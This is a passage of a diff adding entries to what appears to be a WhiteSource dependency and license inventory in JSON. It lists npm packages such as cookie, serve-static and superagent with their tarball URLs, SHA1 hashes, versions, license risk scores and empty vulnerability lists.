"https://registry.npmjs.org/registry-auth-token/-/registry-auth-token-3.4.0.tgz", + "homePage": "https://github.com/rexxars/registry-auth-token#readme", + "genericPackageIndex": "https://www.npmjs.org/package/registry-auth-token" + }, + "matchType": "SHA1", + "sha1": "d7446815433f5d5ed6431cd5dca21048f66b397e", + "name": "registry-auth-token-3.4.0.tgz", + "artifactId": "registry-auth-token-3.4.0.tgz", + "version": "3.4.0", + "groupId": "registry-auth-token", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/a6bf9ee9-8487-4f4f-be42-20a51ffa8c43" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "4840fa32-bf79-4a48-9e6a-477a590ae76b", + "keyId": 26972472, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/object.assign/-/object.assign-4.1.0.tgz", + "homePage": "https://github.com/ljharb/object.assign#readme", + "genericPackageIndex": "https://www.npmjs.org/package/object.assign" + }, + "matchType": "SHA1", + "sha1": "968bf1100d7956bb3ca086f006f846b3bc4008da", + "name": "object.assign-4.1.0.tgz", + "artifactId": "object.assign-4.1.0.tgz", + "version": "4.1.0", + "groupId": "object.assign", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/object.assign" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "b9b62812-ca88-4ff0-b249-5802237a0dde", + "keyId": 27523262, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/cookie/-/cookie-0.4.0.tgz", + "homePage": "https://github.com/jshttp/cookie#readme", + "genericPackageIndex": "https://www.npmjs.org/package/cookie" + }, + "matchType": "SHA1", + "sha1": "beb437e7022b3b6d49019d088665303ebe9c14ba", + "name": "cookie-0.4.0.tgz", + "artifactId": "cookie-0.4.0.tgz", + "version": "0.4.0", + "groupId": "cookie", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/88848df5-eeed-455a-a1aa-cb0be1a0be24" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "9022c7b4-3bd8-4ca9-bbb5-17471d7f9950", + "keyId": 27496222, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/range-parser/-/range-parser-1.2.1.tgz", + "homePage": "https://github.com/jshttp/range-parser#readme", + "genericPackageIndex": "https://www.npmjs.org/package/range-parser" + }, + "matchType": "SHA1", + "sha1": "3cf37023d199e1c24d1a55b84800c2f3e6468031", + "name": "range-parser-1.2.1.tgz", + "artifactId": "range-parser-1.2.1.tgz", + "version": "1.2.1", + "groupId": "range-parser", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/9662c5cf-c479-4974-b800-669f1464b86c" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "71058e41-c1fa-48fb-bf95-d0cddae02bbc", + "keyId": 26948359, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/is-redirect/-/is-redirect-1.0.0.tgz", + "homePage": "https://github.com/sindresorhus/is-redirect", + "genericPackageIndex": "https://www.npmjs.org/package/is-redirect" + }, + "matchType": "SHA1", + "sha1": "1d03dded53bd8db0f30c26e4f95d36fc7c87dc24", + "name": "is-redirect-1.0.0.tgz", + "artifactId": "is-redirect-1.0.0.tgz", + "version": "1.0.0", + "groupId": "is-redirect", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/4b4dd6de-c9de-4a63-b073-c67649861a25" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "61a05100-0b1b-4c0d-99b9-ca9fcda8b17d", + "keyId": 27167389, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/normalize-package-data/-/normalize-package-data-2.5.0.tgz", + "homePage": "https://github.com/npm/normalize-package-data#readme", + "genericPackageIndex": "https://www.npmjs.org/package/normalize-package-data" + }, + "matchType": "SHA1", + "sha1": "e66db1838b200c1dfc233225d12cb36520e234a8", + "name": "normalize-package-data-2.5.0.tgz", + "artifactId": "normalize-package-data-2.5.0.tgz", + "version": "2.5.0", + "groupId": "normalize-package-data", + "licenses": [ + { + "name": "BSD 2", + "url": "http://opensource.org/licenses/bsd-license", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/normalize-package-data" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "7462ebae-4602-400b-a00b-d990b164b17d", + "keyId": 27509158, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/serve-static/-/serve-static-1.14.1.tgz", + "homePage": "https://github.com/expressjs/serve-static#readme", + "genericPackageIndex": "https://www.npmjs.org/package/serve-static" + }, + "matchType": "SHA1", + "sha1": "666e636dc4f010f7ef29970a88a674320898b2f9", + "name": "serve-static-1.14.1.tgz", + "artifactId": "serve-static-1.14.1.tgz", + "version": "1.14.1", + "groupId": "serve-static", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/serve-static/v/1.14.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "c4a95148-b6b4-4470-bd26-32b5d768af89", + "keyId": 26958371, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.6.tgz", + "homePage": "https://github.com/jbgutierrez/path-parse#readme", + "genericPackageIndex": "https://www.npmjs.org/package/path-parse" + }, + "matchType": "SHA1", + "sha1": "d62dbb5679405d72c4737ec58600e9ddcf06d24c", + "name": "path-parse-1.0.6.tgz", + "artifactId": "path-parse-1.0.6.tgz", + "version": "1.0.6", + "groupId": "path-parse", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/path-parse/v/1.0.6" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "83776f21-c4ec-4746-8847-3459e1e2325d", + "keyId": 26954900, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/uniq/-/uniq-1.0.1.tgz", + "homePage": "https://github.com/mikolalysenko/uniq", + "genericPackageIndex": "https://www.npmjs.org/package/uniq" + }, + "matchType": "SHA1", + "sha1": "b31c5ae8254844a3a8281541ce2b04b865a734ff", + "name": "uniq-1.0.1.tgz", + "artifactId": "uniq-1.0.1.tgz", + "version": "1.0.1", + "groupId": "uniq", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/uniq" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "46d7be49-0f1a-4e7e-91dd-88ff6eb8e60e", + "keyId": 26966847, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/to-fast-properties/-/to-fast-properties-2.0.0.tgz", + "homePage": "https://github.com/sindresorhus/to-fast-properties#readme", + "genericPackageIndex": "https://www.npmjs.org/package/to-fast-properties" + }, + "matchType": "SHA1", + "sha1": "dc5e698cbd079265bc73e0377681a4e4e83f616e", + "name": "to-fast-properties-2.0.0.tgz", + "artifactId": "to-fast-properties-2.0.0.tgz", + "version": "2.0.0", + "groupId": "to-fast-properties", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/c1ac3a27-04fe-4479-a0b8-4c7c27afb5ae" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "40cd9aee-69a9-4490-b277-b5a8f47bfc2e", + "keyId": 27078734, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/big.js/-/big.js-5.2.2.tgz", + "homePage": "https://github.com/MikeMcl/big.js#readme", + "genericPackageIndex": "https://www.npmjs.org/package/big.js" + }, + "matchType": "SHA1", + "sha1": "65f0af382f578bcdc742bd9c281e9cb2d7768328", + "name": "big.js-5.2.2.tgz", + "artifactId": "big.js-5.2.2.tgz", + "version": "5.2.2", + "groupId": "big.js", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/big.js" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "a35bcb6e-20a2-402e-b5ef-9c890033717d", + "keyId": 27390988, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/prop-types-exact/-/prop-types-exact-1.2.0.tgz", + "homePage": "https://github.com/airbnb/prop-types-exact#readme", + "genericPackageIndex": "https://www.npmjs.org/package/prop-types-exact" + }, + "matchType": "SHA1", + "sha1": "825d6be46094663848237e3925a98c6e944e9869", + "name": "prop-types-exact-1.2.0.tgz", + "artifactId": "prop-types-exact-1.2.0.tgz", + "version": "1.2.0", + "groupId": "prop-types-exact", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/prop-types-exact" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "be305d9c-3499-4d29-b105-1f29387124d5", + "keyId": 26954829, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/find-up/-/find-up-2.1.0.tgz", + "homePage": "https://github.com/sindresorhus/find-up#readme", + "genericPackageIndex": "https://www.npmjs.org/package/find-up" + }, + "matchType": "SHA1", + "sha1": "45d1b7e506c717ddd482775a2b77920a3c0c57a7", + "name": "find-up-2.1.0.tgz", + "artifactId": "find-up-2.1.0.tgz", + "version": "2.1.0", + "groupId": "find-up", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/a87ed7e0-5da1-46d1-b193-f58f044fdfb9" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "920b5b7e-c152-443a-a745-d86c34194fb1", + "keyId": 26955549, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/redent/-/redent-1.0.0.tgz", + "homePage": "https://github.com/sindresorhus/redent", + "genericPackageIndex": "https://www.npmjs.org/package/redent" + }, + "matchType": "SHA1", + "sha1": "cf916ab1fd5f1f16dfb20822dd6ec7f730c2afde", + "name": "redent-1.0.0.tgz", + "artifactId": "redent-1.0.0.tgz", + "version": "1.0.0", + "groupId": "redent", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/dfcbe445-ac5d-49cb-b86c-4316052deab4" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "660a3383-bf0c-4985-ba21-ca195d8bde10", + "keyId": 26965537, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/lodash.isnumber/-/lodash.isnumber-3.0.3.tgz", + "homePage": "https://lodash.com/", + "genericPackageIndex": "https://www.npmjs.org/package/lodash.isnumber" + }, + "matchType": "SHA1", + "sha1": "3ce76810c5928d03352301ac287317f11c0b1ffc", + "name": "lodash.isnumber-3.0.3.tgz", + "artifactId": "lodash.isnumber-3.0.3.tgz", + "version": "3.0.3", + "groupId": "lodash.isnumber", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/8969fa56-637f-4fab-a9e3-06a07fc64df9" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "9657638a-badb-43d1-ba18-01713f495852", + "keyId": 26948412, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", + "homePage": "https://github.com/feross/safe-buffer", + "genericPackageIndex": "https://www.npmjs.org/package/safe-buffer" + }, + "matchType": "SHA1", + "sha1": "991ec69d296e0313747d59bdfd2b745c35f8828d", + "name": "safe-buffer-5.1.2.tgz", + "artifactId": "safe-buffer-5.1.2.tgz", + "version": "5.1.2", + "groupId": "safe-buffer", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/dcd9ede9-0523-4912-aa53-8407687a8650" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "70228536-a594-44c7-8eb0-cc0e4253d407", + "keyId": 26955678, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/to-fast-properties/-/to-fast-properties-1.0.3.tgz", + "homePage": "https://github.com/sindresorhus/to-fast-properties#readme", + "genericPackageIndex": "https://www.npmjs.org/package/to-fast-properties" + }, + "matchType": "SHA1", + "sha1": "b83571fa4d8c25b82e231b06e3a3055de4ca1a47", + "name": "to-fast-properties-1.0.3.tgz", + "artifactId": "to-fast-properties-1.0.3.tgz", + "version": "1.0.3", + "groupId": "to-fast-properties", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/9072e324-acad-4a1d-a8de-bbf987d0bfde" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "6cedf3ca-3ed0-4aa7-809a-0b684525253e", + "keyId": 27402511, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/proxy-addr/-/proxy-addr-2.0.5.tgz", + "homePage": "https://github.com/jshttp/proxy-addr#readme", + "genericPackageIndex": "https://www.npmjs.org/package/proxy-addr" + }, + "matchType": "SHA1", + "sha1": "34cbd64a2d81f4b1fd21e76f9f06c8a45299ee34", + "name": "proxy-addr-2.0.5.tgz", + "artifactId": "proxy-addr-2.0.5.tgz", + "version": "2.0.5", + "groupId": "proxy-addr", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/proxy-addr" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "a947583b-0af9-445d-949d-30bcdcc9cff4", + "keyId": 26955628, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/duplexer3/-/duplexer3-0.1.4.tgz", + "homePage": "https://github.com/floatdrop/duplexer3", + "genericPackageIndex": "https://www.npmjs.org/package/duplexer3" + }, + "matchType": "SHA1", + "sha1": "ee01dd1cac0ed3cbc7fdbea37dc0a8f1ce002ce2", + "name": "duplexer3-0.1.4.tgz", + "artifactId": "duplexer3-0.1.4.tgz", + "version": "0.1.4", + "groupId": "duplexer3", + "licenses": [ + { + "name": "BSD 3", + "url": "http://www.opensource.org/licenses/BSD-3-Clause", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/duplexer3/v/0.1.4" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "9c2cd2f9-bdf8-49a9-ada4-03197c64209b", + "keyId": 26965585, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/configstore/-/configstore-3.1.2.tgz", + "homePage": "https://github.com/yeoman/configstore#readme", + "genericPackageIndex": "https://www.npmjs.org/package/configstore" + }, + "matchType": "SHA1", + "sha1": "c6f25defaeef26df12dd33414b001fe81a543f8f", + "name": "configstore-3.1.2.tgz", + "artifactId": "configstore-3.1.2.tgz", + "version": "3.1.2", + "groupId": "configstore", + "licenses": [ + { + "name": "BSD 2", + "url": "http://opensource.org/licenses/bsd-license", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/94c854cb-cdd5-4c0a-a04a-157a0098e22e" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "be6f5cbc-5655-481f-a45d-5c6e48e0fc84", + "keyId": 27452496, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/accepts/-/accepts-1.3.7.tgz", + "homePage": "https://github.com/jshttp/accepts#readme", + "genericPackageIndex": "https://www.npmjs.org/package/accepts" + }, + "matchType": "SHA1", + "sha1": "531bc726517a3b2b41f850021c6cc15eaab507cd", + "name": "accepts-1.3.7.tgz", + "artifactId": "accepts-1.3.7.tgz", + "version": "1.3.7", + "groupId": "accepts", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/accepts/v/1.3.7" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "45f21e76-af27-4e0b-9aaf-43deff3ea436", + "keyId": 27390981, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/reflect.ownkeys/-/reflect.ownkeys-0.2.0.tgz", + "homePage": "https://github.com/glenjamin/Reflect.ownKeys", + "genericPackageIndex": "https://www.npmjs.org/package/reflect.ownkeys" + }, + "matchType": "SHA1", + "sha1": "749aceec7f3fdf8b63f927a04809e90c5c0b3460", + "name": "reflect.ownkeys-0.2.0.tgz", + "artifactId": "reflect.ownkeys-0.2.0.tgz", + "version": "0.2.0", + "groupId": "reflect.ownkeys", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/b300b010-dd64-4880-b273-f8c499236909" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "ee571b9b-413a-434f-b3d3-94192649eee8", + "keyId": 26964179, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/forwarded/-/forwarded-0.1.2.tgz", + "homePage": "https://github.com/jshttp/forwarded#readme", + "genericPackageIndex": "https://www.npmjs.org/package/forwarded" + }, + "matchType": "SHA1", + "sha1": "98c23dab1175657b8c0573e8ceccd91b0ff18c84", + "name": "forwarded-0.1.2.tgz", + "artifactId": "forwarded-0.1.2.tgz", + "version": "0.1.2", + "groupId": "forwarded", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/forwarded/v/0.1.2" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "ea0faa61-8574-4021-8ee9-0661c1397450", + "keyId": 26948333, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/is-stream/-/is-stream-1.1.0.tgz", + "homePage": "https://github.com/sindresorhus/is-stream#readme", + "genericPackageIndex": "https://www.npmjs.org/package/is-stream" + }, + "matchType": "SHA1", + "sha1": "12d4a3dd4e68e0b79ceb8dbc84173ae80d91ca44", + "name": "is-stream-1.1.0.tgz", + "artifactId": "is-stream-1.1.0.tgz", + "version": "1.1.0", + "groupId": "is-stream", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/is-stream" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "02970346-8290-4fad-adb3-7c34e52d40a7", + "keyId": 26967915, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/superagent/-/superagent-3.8.3.tgz", + "homePage": "https://github.com/visionmedia/superagent#readme", + "genericPackageIndex": "https://www.npmjs.org/package/superagent" + }, + "matchType": "SHA1", + "sha1": "460ea0dbdb7d5b11bc4f78deba565f86a178e128", + "name": "superagent-3.8.3.tgz", + "artifactId": "superagent-3.8.3.tgz", + "version": "3.8.3", + "groupId": "superagent", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/7aaccccb-7d98-4d9c-8e65-4a8a55b1380b" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "6b301061-4ab5-46e4-b866-866ae16c0882", + "keyId": 26961898, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/path-to-regexp/-/path-to-regexp-0.1.7.tgz", + "homePage": "https://github.com/component/path-to-regexp#readme", + "genericPackageIndex": "https://www.npmjs.org/package/path-to-regexp" + }, + "matchType": "SHA1", + "sha1": "df604178005f522f15eb4490e7247a1bfaa67f8c", + "name": "path-to-regexp-0.1.7.tgz", + "artifactId": "path-to-regexp-0.1.7.tgz", + "version": "0.1.7", + "groupId": "path-to-regexp", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/6620fe78-aea4-4359-a30d-39d14977dbf0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "b8abb961-4f95-4306-b568-4812b5e60d28", + "keyId": 26948617, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-2.2.1.tgz", + "homePage": "https://github.com/chalk/ansi-styles#readme", + "genericPackageIndex": "https://www.npmjs.org/package/ansi-styles" + }, + "matchType": "SHA1", + "sha1": "b432dd3358b634cf75e1e4664368240533c1ddbe", + "name": "ansi-styles-2.2.1.tgz", + "artifactId": "ansi-styles-2.2.1.tgz", + "version": "2.2.1", + "groupId": "ansi-styles", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/ansi-styles" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "fa2b2e9a-f474-4d26-be1d-d3f27437acd4", + "keyId": 26955387, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/indent-string/-/indent-string-2.1.0.tgz", + "homePage": "https://github.com/sindresorhus/indent-string#readme", + "genericPackageIndex": "https://www.npmjs.org/package/indent-string" + }, + "matchType": "SHA1", + "sha1": "8e2d48348742121b4a8218b7a137e9a52049dc80", + "name": "indent-string-2.1.0.tgz", + "artifactId": "indent-string-2.1.0.tgz", + "version": "2.1.0", + "groupId": "indent-string", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/indent-string" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "c0117b08-a752-4884-b281-e9240704409d", + "keyId": 26958438, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/source-map-resolve/-/source-map-resolve-0.5.2.tgz", + "homePage": "https://github.com/lydell/source-map-resolve#readme", + "genericPackageIndex": "https://www.npmjs.org/package/source-map-resolve" + }, + "matchType": "SHA1", + "sha1": "72e2cc34095543e43b2c62b2c4c10d4a9054f259", + "name": "source-map-resolve-0.5.2.tgz", + "artifactId": "source-map-resolve-0.5.2.tgz", + "version": "0.5.2", + "groupId": "source-map-resolve", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/cf6afd28-c4e8-40e5-a1d2-56d7bff76334" + } + ], + 